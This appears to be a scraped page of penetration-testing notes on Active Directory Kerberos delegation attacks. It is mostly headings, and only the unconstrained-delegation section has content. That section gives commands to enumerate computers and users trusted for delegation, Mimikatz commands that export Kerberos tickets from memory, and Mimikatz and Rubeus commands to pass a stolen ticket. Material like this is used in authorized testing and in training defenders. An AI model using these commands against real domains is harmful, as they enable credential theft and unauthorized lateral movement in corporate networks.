Delegations
Unconstrained Delegation
Enumerate
Get-DomainComputer -UnConstrainedGet-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}Exploitation
# Extract the TGT
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
# Pass the ticket
Invoke-Mimikatz -Command '"kerberos::ptt TGT.kirbi"'
Rubeus.exe ptt /ticket:"base64 | file.kirbi" # Rubues allows base64 format as alternativePrinter bug
Constrained Delegation
Enumerate
Exploitation
Resource Based Delegation
Enumerate
Exploitation
Create fake machine
Change security descriptor
Abuse using Rubeus
Last updated